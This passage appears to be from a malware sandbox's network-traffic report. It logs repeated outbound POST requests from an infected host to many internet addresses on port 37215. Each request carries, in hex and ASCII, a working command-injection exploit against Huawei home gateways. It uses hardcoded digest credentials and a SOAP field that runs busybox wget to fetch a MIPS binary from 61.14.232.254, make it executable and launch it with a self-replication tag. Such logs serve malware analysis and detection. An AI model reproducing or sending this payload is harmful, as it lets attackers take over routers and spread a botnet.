2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1699192.168.2.133483441.185.76.10137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617430925 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1700192.168.2.135287841.41.34.1837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617438078 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1701192.168.2.1345958197.32.33.12237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617458105 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1702192.168.2.1335002197.203.94.4337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617480040 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1703192.168.2.133678441.140.98.3137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617506981 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1704192.168.2.1336010157.67.184.20837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617516041 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1705192.168.2.134962241.184.6.18237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617554903 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1706192.168.2.1359010157.49.77.13037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617556095 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1707192.168.2.1358086157.45.34.5037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617583990 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1708192.168.2.135044241.119.236.2837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617594957 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1709192.168.2.1342744189.83.64.16137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617609024 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
